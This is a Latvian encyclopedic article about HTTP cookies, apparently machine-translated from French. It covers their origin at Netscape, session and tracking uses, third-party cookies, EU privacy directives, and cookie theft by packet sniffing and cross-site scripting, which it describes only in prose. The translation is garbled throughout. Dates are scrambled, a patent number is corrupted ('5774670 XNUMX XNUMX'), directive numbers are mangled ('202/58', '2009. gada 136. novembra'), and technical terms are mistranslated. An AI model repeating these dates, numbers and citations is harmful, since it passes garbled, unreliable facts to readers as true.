Interneta sīkfails: kas tas ir? Definīcija, izcelsme, veidi un privātums

Un sīkfails vai tīmekļa sīkfails (vai cepums, saīsināti kā liecinieks Kvebekā) tiek definēts ar HTTP sakaru protokolu kā informācijas secību, ko HTTP serveris nosūta HTTP klientam, kuru tas atgriež katru reizi, kad noteiktos apstākļos tiek vaicāts tas pats HTTP serveris.

Cepums ir līdzvērtīgs a neliels teksta fails, kas tiek glabāts terminālī interneta lietotāja. Tie, kas pastāv jau vairāk nekā 20 gadus, ļauj vietņu izstrādātājiem saglabāt lietotāja datus, lai atvieglotu navigāciju un atļautu noteiktas funkcijas. Sīkdatnes vienmēr ir bijušas vairāk vai mazāk strīdīgas, jo tās satur atlikušo personas informāciju, ko potenciāli var izmantot trešās puses.

Tīmekļa serveris to nosūta kā HTTP galveni tīmekļa pārlūkprogrammai, kas to atgriež nemainīgu katru reizi, kad tas piekļūst serverim. Sīkdatni var izmantot, lai autentifikācija, sesija (valsts uzturēšana), un par saglabāt konkrētu informāciju par lietotāju, piemēram, vietnes preferences vai elektroniskā iepirkumu groza saturu. Termins sīkfails ir atvasināts no burvju cepums, labi zināms jēdziens UNIX skaitļošanā, kas iedvesmoja pārlūkprogrammas sīkfailu ideju un nosaukumu. Pastāv dažas sīkdatņu alternatīvas, katrai no tām ir savs lietojums, priekšrocības un trūkumi.

Tā kā sīkfaili ir vienkārši teksta faili, tie nav izpildāmi. Tie nav ne spiegprogrammatūra, ne vīrusi, lai gan sīkfailus no dažām vietnēm nosaka daudzas pretvīrusu programmatūras, jo tās ļauj izsekot lietotājiem, kad viņi apmeklē vairākas vietnes. 

Lielākā daļa mūsdienu pārlūkprogrammu lietotājiem ļauj izlemt, vai pieņemt vai noraidīt sīkfailus. Lietotāji var arī izvēlieties, cik ilgi sīkfaili tiek glabāti. Tomēr pilnīga sīkfailu noraidīšana padara dažas vietnes neizmantojamas. Piemēram, glabājiet iepirkumu grozus vai vietnes, kurās ir jāpiesakās, izmantojot akreditācijas datus (lietotājvārdu un paroli).

Historique

termins cepums cēlies no angļu valodas termina burvju cepums, kas ir datu pakete, ko programma saņem un atgriež nemainītā veidā. Sīkdatnes jau tika izmantotas IT, kad Lū Montulli radās ideja tos izmantot tīmekļa komunikācijā jūnijā 1994. Tajā laikā viņš strādāja Netscape Communications, kas bija izstrādājis e-komercijas lietojumprogrammu klientam. Sīkfaili sniedza risinājumu veikala virtuālā iepirkumu groza ieviešanas uzticamības problēmai.

John Giannandrea un Lou Montulli tajā pašā gadā uzrakstīja pirmo Netscape sīkfailu specifikāciju. Mosaic Netscape 0.9 beta versija, kas izlaista 13. gada 1994. oktobrī, integrēta sīkfailu tehnoloģija (skatīt ziņu). Pirmā (neeksperimentālā) sīkdatņu izmantošana bija, lai noteiktu, vai Netscape vietnes apmeklētāji šo vietni ir apmeklējuši iepriekš. Montulli 1995. gadā iesniedza patenta pieteikumu sīkfailu tehnoloģijai, un tika piešķirts ASV patents 5774670 XNUMX XNUMX. piešķirts 1998. gadā.

Pēc ieviešanas Netscape 0.9 beta versijā 1994. gadā sīkfaili tika integrēti pārlūkprogrammā Internet Explorer 2, kas tika izlaista 1995. gada oktobrī.

Sīkdatņu ieviešana sabiedrībai vēl nav bijusi plaši zināma. Jo īpaši pārlūkprogrammas iestatījumos pēc noklusējuma tika pieņemti sīkfaili, un lietotāji netika informēti par to klātbūtni. Daži cilvēki zināja par sīkfailu esamību aptuveni 1995. gada pirmajā ceturksnī, taču plašāka sabiedrība par to esamību pievērsās tikai pēc tam, kad Financial Times 12. gada 1996. februārī publicēja rakstu. Tajā pašā gadā sīkfaili saņēma lielu mediju uzmanību. iespējamās privātuma iejaukšanās dēļ. Sīkdatņu tēma tika apspriesta divās Amerikas Federālās tirdzniecības komisijas konsultācijās 1996. un 1997. gadā.

Oficiālās sīkdatņu specifikācijas izstrāde jau tika uzsākta. Pirmās oficiālās specifikācijas diskusijas notika 1995. gada aprīlī www-talk adresātu sarakstā. Tika izveidota īpaša IETF darba grupa. Divus alternatīvus priekšlikumus statusa ieviešanai HTTP transakcijās ierosināja attiecīgi Braiens Bīlendorfs un Deivids Kristols, taču grupa paša Kristola vadībā nolēma kā sākumpunktu izmantot Netscape specifikāciju. 1996. gada februārī darba grupa konstatēja, ka trešo pušu sīkfaili būtiski apdraud privātumu. Grupas izstrādātā specifikācija galu galā tika publicēta kā RFC 2109.

Kopš 2014. gada beigām daudzās vietnēs mēs redzam reklāmkarogu par sīkfailiem. Ir vismaz viens pārlūkprogrammas paplašinājums, kas ļauj reklāmkarogs netiek rādīts.

Sīkdatņu veidi un izmantošana

Sesijas vadība

Sīkfailus var izmantot, lai saglabātu lietotāja datus navigācijas laikā, kā arī vairāku apmeklējumu laikā. Sīkdatnes tika ieviestas, lai nodrošinātu elektronisko iepirkumu grozu ieviešanas līdzekli – virtuālu ierīci, kurā lietotājs, pārlūkojot vietni, var uzkrāt preces, kuras vēlas iegādāties.

Mūsdienās tādas lietotnes kā iepirkumu grozi saglabā preču sarakstu servera datu bāzē, kas ir vēlams. nekā saglabāt tos pašā sīkfailā. Tīmekļa serveris nosūta sīkfailu ar unikālu sesijas ID. Pēc tam tīmekļa pārlūkprogramma atgriež šo sesijas ID katrā nākamajā pieprasījumā, un preces grozā tiek saglabātas un saistītas ar to pašu unikālo sesijas ID.

Bieža sīkdatņu izmantošana ir noderīga, lai pieteiktos vietnē, izmantojot akreditācijas datus. Īsāk sakot, tīmekļa serveris vispirms nosūta sīkfailu, kas satur unikālu sesijas ID. Pēc tam lietotāji sniedz savus akreditācijas datus (parasti lietotājvārdu un paroli). Pēc tam tīmekļa lietojumprogramma autentificē sesiju un ļauj lietotājam piekļūt pakalpojumam.

personalizācija

Sīkdatnes var izmantot, lai atcerētos informāciju par vietnes lietotāju, lai turpmāk viņam rādītu atbilstošu saturu. Piemēram, tīmekļa serveris var nosūtīt sīkfailu, kas satur pēdējo lietotājvārdu, kas tika izmantots, lai pieteiktos šajā vietnē, lai šo lietotājvārdu varētu iepriekš aizpildīt turpmākajos apmeklējumos.

Daudzas vietnes izmanto sīkfailus personalizēšanai, pamatojoties uz lietotāja vēlmēm. Lietotāji veidlapā izvēlas savas preferences un iesniedz tās serverim. Serveris kodē preferences sīkfailā un nosūta to atpakaļ pārlūkprogrammai. Pēc tam katru reizi, kad lietotājs piekļūst šīs vietnes lapai, pārlūkprogramma atgriež sīkfailu un tādējādi arī preferenču sarakstu; serveris pēc tam var pielāgot lapu atbilstoši lietotāja vēlmēm. Piemēram, Wikipedia vietne ļauj lietotājiem izvēlēties sev tīkamākās vietnes apvalku. Google meklētājprogramma ļauj saviem lietotājiem (pat ja viņi nav reģistrēti) izvēlēties, cik rezultātu viņi vēlas redzēt katrā rezultātu lapā.

Izsekošana

Izsekošanas sīkdatnes tiek izmantotas, lai izsekotu interneta lietotāju pārlūkošanas paradumiem. Daļēji to var izdarīt arī izmantojot tā datora IP adresi, kurā tiek pieprasīta lapa, vai izmantojot HTTP galveni “novirzītājs”, ko klients nosūta ar katru pieprasījumu, taču sīkfaili nodrošina lielāku precizitāti. To var izdarīt, kā parādīts šajā piemērā:

1. Ja lietotājs izsauc kādu vietnes lapu un pieprasījums nesatur sīkfailu, serveris pieņem, ka šī ir pirmā lietotāja apmeklētā lapa. Pēc tam serveris izveido nejaušu virkni un nosūta to pārlūkprogrammai kopā ar pieprasīto lapu.
2. No šī brīža pārlūkprogramma automātiski nosūtīs sīkfailu ikreiz, kad tiks izsaukta jauna vietnes lapa. Serveris nosūtīs lapu kā parasti, taču žurnāla failā reģistrēs arī izsauktās lapas URL, pieprasījuma datumu, laiku un sīkfailu.

Apskatot žurnāla failu, pēc tam ir iespējams redzēt, kuras lapas un kādā secībā lietotājs ir apmeklējis. Piemēram, ja failā ir daži pieprasījumi, kas veikti, izmantojot sīkfailu id=abc, tas var noteikt, ka visi šie pieprasījumi nāk no viena lietotāja. Pieprasītais URL, ar pieprasījumiem saistītais datums un laiks ļauj izsekot lietotāja pārlūkošanai.

Trešo pušu sīkfaili un tīmekļa bāksignāli, kas izskaidroti tālāk, papildus nodrošina izsekošanu dažādās vietnēs. Vienas vietnes izsekošana parasti tiek izmantota statistikas nolūkos. Turpretim izsekošanu dažādās vietnēs, izmantojot trešo pušu sīkfailus, reklāmas uzņēmumi parasti izmanto, lai izveidotu anonīmus lietotāju profilus (kas pēc tam tiek izmantoti, lai noteiktu, kuras reklāmas lietotājam jāparāda, kā arī nosūtītu viņam e-pasta ziņojumus, kas atbilst šīm reklāmām — SPAM). ).

Izsekošanas sīkfaili var apdraudēt lietotāja privātumu, taču tos var viegli izdzēst. Lielākajā daļā mūsdienu pārlūkprogrammu ir iekļauta iespēja automātiski dzēst pastāvīgos sīkfailus, aizverot lietojumprogrammu.

Trešās puses sīkfaili

Tīmekļa lapā esošie attēli un citi objekti var atrasties serveros, kas atšķiras no servera, kas mitina lapu. Lai parādītu lapu, pārlūkprogramma lejupielādē visus šos objektus. Lielākā daļa vietņu satur informāciju no dažādiem avotiem. Piemēram, ja pārlūkprogrammā ierakstāt www.example.com, bieži vien daļā lapas būs objekti vai reklāmas, kas nāk no dažādiem avotiem, t.i., no cita domēna, nevis no www. .example.com. "Pirmās puses" sīkfaili ir sīkfaili, kurus iestata pārlūkprogrammas adreses joslā norādītais domēns. Trešās puses sīkfailus iestata viens no lapas objektiem, kas nāk no cita domēna.

Pēc noklusējuma pārlūkprogrammas, piemēram, Mozilla Firefox, Microsoft Internet Explorer un Opera, pieņem trešo pušu sīkfailus, taču lietotāji var mainīt iestatījumus pārlūkprogrammas opcijās, lai tās bloķētu. Trešo pušu sīkfailiem, kas nodrošina tīmekļa funkcionalitāti, nav drošības riska, taču tie tiek izmantoti arī lietotāju izsekošanai. no vietnes uz vietni.

Rīki, piemēram, Ghostery, kas pieejami visām pārlūkprogrammām, tostarp Google Chrome, var bloķēt apmaiņu starp trešajām pusēm.

Īstenošana

Sīkfaili ir nelieli datu gabali, ko tīmekļa serveris nosūta pārlūkprogrammai. Pārlūkprogramma tos nemainītus atgriež serverī, ieviešot stāvokli (pagātnes notikumu atmiņu) citādi bezvalsts HTTP darījumā. Bez sīkfailiem katra tīmekļa lapas vai tīmekļa lapas komponenta izguve ir atsevišķs notikums, kas nav atkarīgs no citiem tai pašai vietnei iesniegtajiem pieprasījumiem. Papildus tam, ka sīkfailus var iestatīt tīmekļa serveris, tos var iestatīt arī skriptu valodas, piemēram, JavaScript, ja pārlūkprogramma to atbalsta un atļauj.

Oficiālā sīkfailu specifikācija liecina, ka pārlūkprogrammām jāspēj saglabāt un atkārtoti nosūtīt minimālo skaitu sīkfailu. Konkrēti, pārlūkprogrammai jāspēj saglabāt vismaz 300 sīkfailus pa četriem kilobaitiem un vismaz 20 sīkfailus vienam serverim vai domēnam.

Saskaņā ar 3.1 RFC 2965, sīkfailu nosaukumos nav reģistrjutīgi.

Sīkdatne var norādīt tās derīguma termiņa beigu datumu, un tādā gadījumā sīkdatne šajā datumā tiks dzēsta. Ja sīkdatnei nav norādīts derīguma termiņš, sīkfails tiek dzēsts, tiklīdz lietotājs atstāj pārlūkprogrammu. Tāpēc derīguma termiņa norādīšana ir veids, kā nodrošināt sīkfaila darbību vairākās sesijās. Šī iemesla dēļ tiek uzskatīts, ka sīkfaili ar derīguma termiņu ir neatlaidīgs. Lietojumprogrammas piemērs: mazumtirdzniecības vietne var izmantot pastāvīgos sīkfailus, lai reģistrētu preces, ko lietotāji ir ievietojuši iepirkumu grozā (faktiski sīkfails var attiekties uz ierakstu, kas saglabāts pārdošanas vietnes datubāzē, nevis jūsu datorā). . Tādējādi, ja lietotāji pamet pārlūkprogrammu, neveicot pirkumu, un atgriezīsies tajā vēlāk, viņi varēs atkal atrast grozā esošās preces. Ja šīs sīkdatnes nenorādītu derīguma termiņu, tās beigtos, kad pārlūkprogramma tiktu aizvērta, un tiktu zaudēta informācija par groza saturu.

Sīkdatnes var ierobežot līdz noteiktam domēnam, apakšdomēnam vai ceļam serverī, kas tos izveidojis.

Sīkdatnes izveide

Web lapu pārsūtīšana tiek veikta, izmantojot hiperteksta pārsūtīšanas protokolu (HTTP). Ignorējot sīkfailus, pārlūkprogrammas izsauc lapu no tīmekļa serveriem, parasti nosūtot tiem īsu tekstu HTTP pieprasījums. Piemēram, lai piekļūtu lapai www.example.org/index.html, pārlūkprogrammas izveido savienojumu ar serveri www.example.org un nosūta pieprasījumu, kas izskatās šādi:

	GET /index.html HTTP/1.1Host: www.example.org
navigators	→	serveur

Serveris atbild, nosūtot pieprasīto lapu, pirms kuras tiek izsaukts līdzīgs teksts, tiek izsaukta visa HTTP atbilde. Šajā paketē var būt rindas, kas norāda pārlūkprogrammai saglabāt sīkfailus:

	HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value (HTML lapa)
navigators	←	serveur

Serveris nosūta rindu Set-Cookie tikai tad, ja serveris vēlas, lai pārlūkprogramma saglabātu sīkfailu. Set-Cookie ir pieprasījums pārlūkprogrammai saglabāt virkni name=value un atgriezt to visos turpmākajos pieprasījumos serverim. Ja pārlūkprogramma atbalsta sīkfailus un pārlūkprogrammas opcijās ir iespējoti sīkfaili, sīkfails tiks iekļauts visos turpmākajos pieprasījumos, kas tiek nosūtīti tam pašam serverim. Piemēram, pārlūkprogramma izsauc lapu www.example.org/news.html, nosūtot uz serveri www.example.org šādu pieprasījumu:

	GET /news.html HTTP/1.1Host: www.example.orgSīkfails: name=valueAccept: */*
navigators	→	serveur

Šis ir pieprasījums pēc citas lapas no tā paša servera un atšķiras no iepriekš minētā, jo tajā ir virkne, ko serveris iepriekš nosūtīja pārlūkprogrammai. Pateicoties šiem līdzekļiem, serveris zina, ka šis pieprasījums ir saistīts ar iepriekšējo. Serveris atbild, nosūtot izsaukto lapu, kā arī pievienojot tai citus sīkfailus.

Sīkfaila vērtību serveris var mainīt, atbildot uz izsaukto lapu, nosūtot jaunu rindiņu Set-Cookie: name=new_value. Pēc tam pārlūkprogramma aizstāj veco vērtību ar jauno.

Set-Cookie rindu parasti izveido CGI programma vai cita skriptu valoda, nevis HTTP serveris. HTTP serveris (piemērs: Apache) pārsūtīs pārlūkprogrammai tikai programmas rezultātu (dokumentu, pirms kura ir galvene ar sīkfailiem).

Sīkfailus var iestatīt arī JavaScript vai citas līdzīgas valodas, kas darbojas pārlūkprogrammā, t.i., klienta, nevis servera pusē. JavaScript šim nolūkam tiek izmantots objekts document.cookie. Piemēram, paziņojums document.cookie = "temperatūra=20" izveido sīkfailu ar nosaukumu "temperatūra" un ar vērtību 20.

Sīkdatnes atribūti

Papildus nosaukuma/vērtības pārim sīkfailā var būt arī derīguma termiņš, ceļš, domēna nosaukums un paredzētā savienojuma veids, t.i., parasts vai šifrēts. RFC 2965 arī nosaka, ka sīkfailiem ir jābūt obligātam versijas numuram, taču tas parasti tiek izlaists. Šīs datu daļas seko pārim name=new_value un ir atdalītas ar semikolu. Piemēram, serveris var izveidot sīkfailu, nosūtot Set-Cookie rindiņu: name=new_value; beidzas=datums; ceļš=/; domēns=.example.org.

Sīkdatnes derīguma termiņš

Sīkfailu derīguma termiņš beidzas, un pārlūkprogramma tos nenosūta serverim šādās situācijās:

• Kad pārlūkprogramma ir aizvērta, ja sīkfails nav noturīgs.
• Kad ir pagājis sīkfailu derīguma termiņš.
• Kad sīkfailu derīguma termiņš ir mainīts (serveris vai skripts) uz pagātnes datumu.
• Kad pārlūkprogramma pēc lietotāja pieprasījuma izdzēš sīkfailu.

Trešā situācija ļauj serveriem vai skriptiem skaidri dzēst sīkfailu. Ņemiet vērā, ka Google Chrome tīmekļa pārlūkprogrammā ir iespējams uzzināt konkrēta sīkfaila derīguma termiņu, piekļūstot satura iestatījumiem. Datorā saglabātais sīkfails var tajā saglabāties vairākas desmitgades, ja netiks veikta nekāda procedūra, lai to dzēstu.

Stereotipi

Kopš to ieviešanas internetā daudzas idejas par sīkdatnēm ir izplatījušās internetā un plašsaziņas līdzekļos. 1998. gadā CIAC, Amerikas Savienoto Valstu Enerģētikas departamenta datoru incidentu uzraudzības komanda, konstatēja, ka sīkfailu drošības ievainojamības "būtībā neeksistē", un paskaidroja, ka "informācija par jūsu apmeklējumu izcelsmi un jūsu apmeklēto tīmekļa lapu informācija. jau pastāv tīmekļa serveru žurnālfailos”. 2005. gadā Jupiter Research publicēja pētījuma rezultātus, kurā ievērojama daļa respondentu uzskatīja šādus apgalvojumus:

• Cepumi ir kā vīruss, tie inficē lietotāju cietos diskus.
• Sīkdatnes ģenerē pop-up.
• Sūtīšanai tiek izmantoti sīkfaili spam.
• Sīkdatnes tiek izmantotas tikai reklāmai.

Sīkdatnes nevar izdzēst vai nolasīt informāciju no lietotāja datora. Tomēr sīkfaili ļauj noteikt tīmekļa lapas, kuras lietotājs apmeklējis noteiktā vietnē vai vietņu kopā. Šo informāciju var apkopot lietotāja profilā, ko var izmantot vai pārdot tālāk trešajām pusēm, kas var radīt nopietnas privātuma problēmas. Daži profili ir anonīmi tādā nozīmē, ka tajos nav personas informācijas, tomēr pat šādi profili var būt apšaubāmi.

Saskaņā ar šo pašu pētījumu liela daļa interneta lietotāju nezina, kā izdzēst sīkfailus. Viens no iemesliem, kāpēc cilvēki neuzticas sīkfailiem, ir tas, ka dažas vietnes ir ļaunprātīgi izmantojušas sīkfailu personu identificējošo aspektu un kopīgojušas šo informāciju ar citiem avotiem. Liela daļa mērķtiecīgu reklāmu un nevēlamu e-pasta ziņojumu, kas tiek uzskatīti par surogātpastu, nāk no informācijas, kas iegūta no izsekošanas sīkfailiem.

Pārlūka iestatījumi

Lielākā daļa pārlūkprogrammu atbalsta sīkfailus un ļauj lietotājam tos atspējot. Visizplatītākās iespējas ir:

• Pilnībā iespējojiet vai atspējojiet sīkfailus, lai tie tiktu pastāvīgi pieņemti vai bloķēti.
• Ļaujiet lietotājam redzēt aktīvos sīkfailus attiecīgajā lapā, pārlūkprogrammas adreses joslā ievadot javascript: alert(document.cookie). Dažās pārlūkprogrammās ir iekļauts sīkfailu pārvaldnieks lietotājam, kurš var skatīt un selektīvi dzēst pārlūkprogrammas pašlaik saglabātos sīkfailus.

Lielākā daļa pārlūkprogrammu ļauj arī pilnībā dzēst personas datus, tostarp sīkfailus. Ir arī papildu moduļi sīkfailu atļauju kontrolei.

Privātums un trešo pušu sīkfaili

Šajā fiktīvajā piemērā reklāmas uzņēmums ir ievietojis banerus divās tīmekļa vietnēs. Izmitinot banerus savos serveros un izmantojot trešo pušu sīkfailus, reklāmas uzņēmums var izsekot lietotāja navigācijai šajās divās vietnēs.

Sīkfailiem ir svarīga ietekme uz tīmekļa lietotāju privātumu un anonimitāti. Lai gan sīkfaili tiek nosūtīti atpakaļ tikai uz serveri, kas tos iestatījis, vai uz serveri, kas pieder vienam un tam pašam interneta domēnam, tīmekļa lapā tomēr var būt attēli vai citi komponenti, kas saglabāti serveros, kas pieder citiem domēniem. Tiek izsaukti sīkfaili, kas tiek iestatīti šo ārējo komponentu atkopšanas laikā trešās puses sīkfaili. Tas ietver sīkfailus no nevēlamiem uznirstošajiem logiem.

Reklāmas uzņēmumi izmanto trešo pušu sīkfailus, lai izsekotu lietotājus dažādās viņu apmeklētajās vietnēs. Jo īpaši reklāmas uzņēmums var izsekot lietotāju visās lapās, kurās tas ir ievietojis reklāmas attēlus vai izsekošanas pikseļus. Zināšanas par lietotāja apmeklētajām lapām ļauj reklāmas uzņēmumam atlasīt lietotāja reklāmas preferences.

Daži uzskata, ka iespēja izveidot lietotāja profilu ir privātuma pārkāpums, īpaši, ja izsekošana tiek veikta dažādos domēnos, izmantojot trešās puses sīkfailus. Šī iemesla dēļ dažās valstīs ir sīkfailu likumdošana.

ASV valdība ieviesa stingrus sīkdatņu izvietošanas noteikumus 2000. gadā pēc tam, kad atklājās, ka Baltā nama Narkotiku politikas birojs izmanto sīkfailus, lai izsekotu to lietotāju datorus, kuri skatās tiešsaistes narkotiku reklāmas. 2002. gadā privātuma aktīvists Daniels Brends atklāja, ka CIP atstāja pastāvīgus sīkfailus datoros, kas bija apmeklējuši tās vietnes. Kad CIP tika informēta par šo pārkāpumu, tā paziņoja, ka šie sīkfaili netika nosūtīti ar nolūku, un pārtrauca to uzstādīšanu. 25. gada 2005. decembrī Brandts atklāja, ka Nacionālās drošības aģentūra (NSA) ir atstājusi divus pastāvīgos sīkfailus apmeklētāju datoros programmatūras atjauninājuma dēļ. Pēc paziņojuma NSA nekavējoties atspējoja sīkfailus.

Apvienotajā Karalistē, Sīkdatņu likums “, kas stājās spēkā 25.gada 2012.maijā, uzliek par pienākumu vietnēm paziņot par saviem nodomiem, tādējādi ļaujot lietotājiem izvēlēties, vai viņi vēlas atstāt vai neatstāt pēdas no to caurbraukšanas internetā. Tādējādi tos var pasargāt no reklāmas mērķauditorijas atlases. tomēr saskaņā ar Guardian, interneta lietotāju piekrišana ne vienmēr ir nepārprotama; ir veiktas izmaiņas lietotāja piekrišanas nosacījumos, padarot to tādējādi netieši norādīts.

Direktīva 2002/58 par privātumu

Direktīvā 202/58 par privātumu un elektronisko saziņu ir ietverti sīkdatņu izmantošanas noteikumi. Jo īpaši šīs direktīvas 5. panta 3. punkts nosaka, ka datus (piemēram, sīkfailus) lietotāja datorā var uzglabāt tikai tad, ja:

• lietotājs ir informēts par to, kā dati tiek izmantoti;
• lietotājam tiek dota iespēja atteikt šo uzglabāšanas darbību. Tomēr šajā pantā ir arī teikts, ka datu uzglabāšana tehnisku iemeslu dēļ ir atbrīvota no šī likuma.

Tomēr direktīva bija jāievieš no 2003. gada oktobra, un saskaņā ar 2004. gada decembra ziņojumu, kurā arī norādīts, ka atsevišķas dalībvalstis (Slovākija, Latvija, Grieķija, Beļģija un Luksemburga) vēl nav transponējušas direktīvu, un tā tika ieviesta praksē tikai ļoti nepilnīgi. direktīvu valsts tiesību aktos.

Saskaņā ar G29 2010. gada atzinumu šī direktīva, kas jo īpaši nosaka sīkdatņu izmantošanu biheiviorālās reklāmas nolūkos, ar interneta lietotāja nepārprotamu piekrišanu joprojām tiek piemērota ļoti slikti. Faktiski lielākā daļa vietņu to dara tādā veidā, kas neatbilst direktīvai, aprobežojoties ar vienkāršu "reklāmkarogu", kas informē par "sīkfailu" izmantošanu, nesniedzot informāciju par lietojumiem, nenošķirot "tehniskās" sīkdatnes. "izsekošanas" sīkdatnes, kā arī piedāvāt reālu izvēli lietotājam, kurš vēlas uzturēt tehniskās sīkdatnes (piemēram, iepirkumu groza pārvaldības sīkfailus) un atteikties no "izsekošanas" sīkdatnēm. Patiesībā daudzas vietnes nedarbojas pareizi, ja sīkfaili tiek atteikti, kas neatbilst Direktīvai 2002/58 vai Direktīvai 95/46 (Personas datu aizsardzība).

Direktīva 2009 / 136 / CE

Šis materiāls ir atjaunināts ar 2009. gada 136. novembra Direktīvu 25/2009/EK, kurā teikts, ka "informācijas glabāšana vai piekļuves iegūšana jau saglabātai informācijai abonenta vai lietotāja gala iekārtā ir atļauta tikai ar nosacījumu, ka abonents vai lietotājs ir devis savu piekrišanu pēc tam, kad saskaņā ar Direktīvu 95/46/EK ir saņēmis skaidru un pilnīgu informāciju par apstrādes mērķiem. Tāpēc jaunā direktīva pastiprina pienākumus pirms sīkdatņu ievietošanas interneta lietotāja datorā.

Direktīvas sākotnējos apsvērumos Eiropas likumdevējs tomēr norāda: "Ja tas ir tehniski iespējams un efektīvi, saskaņā ar attiecīgajiem Direktīvas 95/46/EK noteikumiem lietotāja piekrišanu attiecībā uz apstrādi var izteikt, izmantojot pārlūkprogrammas vai citas lietojumprogrammas atbilstošo iestatījumu izmantošana”. Taču patiesībā neviena pārlūkprogramma līdz šim nedod iespēju nošķirt būtiskos tehniskos sīkfailus no neobligātajiem, kas ir jāatstāj lietotāja ziņā.

Šo jauno direktīvu Beļģijas deputāti transponēja 2012. gada jūlijā. 2014. gada pētījums liecina, ka pat deputātiem ir grūtības to piemērot. direktīvas ierobežojumus.

P3P

P3P specifikācijā ir ietverta iespēja serverim norādīt privātuma politiku, kas nosaka, kāda veida informāciju tas apkopo un kādam nolūkam. Šīs politikas ietver (bet ne tikai) ar sīkfailu palīdzību savāktās informācijas izmantošanu. Saskaņā ar P3P definīcijām pārlūkprogramma var pieņemt vai noraidīt sīkfailus, salīdzinot privātuma politikas ar lietotāja preferencēm vai jautājot lietotājam, uzrādot servera deklarēto privātuma politikas paziņojumu.

Daudzas pārlūkprogrammas, tostarp Apple Safari un Microsoft Internet Explorer 6. un 7. versijas, atbalsta P3P, kas ļauj pārlūkprogrammai noteikt, vai pieņemt trešās puses sīkfailu glabāšanu. Opera pārlūkprogramma ļauj lietotājiem atteikties no trešo pušu sīkdatnēm un izveidot globālu un īpašu drošības profilu interneta domēniem. Mozilla Firefox 2. versija atcēla P3P atbalstu, bet atjaunoja to 3. versijā.

Lielākā daļa pārlūkprogrammu var bloķēt trešo pušu sīkfailus, lai palielinātu privātumu un samazinātu reklāmu izsekošanu, negatīvi neietekmējot lietotāja tīmekļa pieredzi. Daudzas reklāmas aģentūras piedāvā iespēju atteikties mērķētai reklāmai, pārlūkprogrammā iestatot vispārīgu sīkfailu, kas deaktivizē šo mērķauditorijas atlasi, taču šāds risinājums nav praktiski efektīvs, ja tas tiek ievērots, jo šis vispārīgais sīkfails tiek dzēsts, tiklīdz lietotājs izdzēš šos sīkfailus, kas atceļ izvēli pieņemts lēmums.

Cepumu trūkumi

Papildus privātuma problēmām sīkfailiem ir arī daži tehniski trūkumi. Jo īpaši tie ne vienmēr precīzi identificē lietotājus, tie var palēnināt vietnes veiktspēju, ja tos var izmantot drošības uzbrukumiem, un tie ir pretrunā ar programmatūras reprezentatīvo stāvokļa nodošanu, arhitektūras stilu.

Neprecīza identifikācija

Ja datorā tiek izmantotas vairākas pārlūkprogrammas, katrā no tām vienmēr ir atsevišķa sīkfailu uzglabāšanas vienība. Tāpēc sīkfaili neidentificē personu, bet gan lietotāja konta, datora un tīmekļa pārlūkprogrammas kombināciju. Tādējādi ikviens var izmantot šos kontus, datorus vai pārlūkprogrammas, kurās ir sīkfailu kopa. Tāpat sīkfaili nenošķir vairākus lietotājus, kuriem ir viens un tas pats lietotāja konts, dators un pārlūkprogramma, piemēram, “interneta kafejnīcās” vai jebkurā vietā, kas nodrošina bezmaksas piekļuvi datora resursiem.

Taču praksē šis apgalvojums vairumā gadījumu izrādās maldīgs, jo mūsdienās "personālo" datoru (vai viedtālruni, vai planšetdatoru, kas ir vēl sliktāk) izmanto galvenokārt viens indivīds. Tas nozīmē, ka mērķauditorija tiek atlasīta konkrētai personai un Pateicoties savāktās informācijas apjomam, tiek sasniegta personalizēta mērķauditorijas atlase, pat ja persona nav “proti” identificēta.

Cepumu zādzība

Cits dators tīklā var nozagt sīkfailu.

Normālas darbības laikā sīkfaili tiek nosūtīti atpakaļ starp serveri (vai serveru grupu tajā pašā domēnā) un lietotāja datora pārlūkprogrammu. Tā kā sīkfailos var būt sensitīva informācija (lietotājvārds, autentifikācijai izmantotā parole utt.), to vērtībām nevajadzētu būt pieejamām citiem datoriem. Sīkdatņu zādzība ir sīkfailu pārtveršana, ko veic nesankcionēta trešā puse.

Sīkfailus var nozagt, izmantojot pakešu sniffer uzbrukumā, ko sauc par sesijas nolaupīšanu. Trafiku tīklā var pārtvert un nolasīt citi datori, nevis tie, kas sūta un saņem (jo īpaši nešifrētā publiskajā Wi-Fi telpā). Šajā trafikā ietilpst sīkfaili, kas tiek nosūtīti sesijās, izmantojot vienkāršu HTTP protokolu. Ja tīkla trafiks nav šifrēts, ļaunprātīgi lietotāji var lasīt citu tīkla lietotāju saziņu, izmantojot "pakešu sniffers".

Šo problēmu var novērst, šifrējot savienojumu starp lietotāja datoru un serveri, izmantojot HTTPS protokolu. Serveris var norādīt a drošs karogs iestatot sīkfailu; pārlūkprogramma to nosūtīs tikai pa drošu līniju, piemēram, SSL savienojumu.

Tomēr daudzas vietnes, lai gan lietotāju autentifikācijai izmanto HTTPS šifrētu saziņu (t.i., pieteikšanās lapu), vēlāk efektivitātes nolūkos nosūta sesijas sīkfailus un citus datus kā parasti, izmantojot nešifrētus HTTP savienojumus. Tādējādi uzbrucēji var pārtvert citu lietotāju sīkfailus un uzdoties par tiem atbilstošās vietnēs vai izmantot tos sīkfailu uzbrukumos.

Skriptēšana vietnē: sīkfails, ar kuru jāapmainās tikai starp serveri un klientu, tiek nosūtīts citai trešajai pusei.

Vēl viens veids, kā nozagt sīkfailus, ir skriptēt vietnes un likt pašai pārlūkprogrammai nosūtīt sīkfailus ļaunprātīgiem serveriem, kas tos nekad nesaņem. Mūsdienu pārlūkprogrammas ļauj izpildīt pieprasītās koda daļas no servera. Ja sīkfailiem tiek piekļūts izpildlaika laikā, to vērtības kaut kādā veidā var tikt paziņotas serveriem, kuriem tiem nevajadzētu piekļūt. Sīkfailu šifrēšana pirms to nosūtīšanas tīklā nepalīdz novērst uzbrukumu.

Šāda veida vietnes skriptēšanu parasti izmanto uzbrucēji vietnēs, kas ļauj lietotājiem publicēt HTML saturu. Integrējot daļu no saderīga koda HTML ieguldījumā, uzbrucējs var saņemt sīkfailus no citiem lietotājiem. Zināšanas par šīm sīkdatnēm var izmantot, pieslēdzoties tai pašai vietnei, izmantojot nozagtās sīkdatnes, tādējādi tiekot atpazīts kā lietotājs, kura sīkdatnes tika nozagtas.

Viens no veidiem, kā novērst šādus uzbrukumus, ir izmantot karogu HttpOnly; tā ir opcija, kas ieviesta kopš Internet Explorer 6. versijas PHP, kopš versijas 5.2.0, kas ir plānots padarīt sīkfailu nepieejamu klientam tuvu skriptam. Tomēr tīmekļa izstrādātājiem tas jāņem vērā, izstrādājot vietni, lai viņi būtu imūni pret skriptēšanu vietnē.

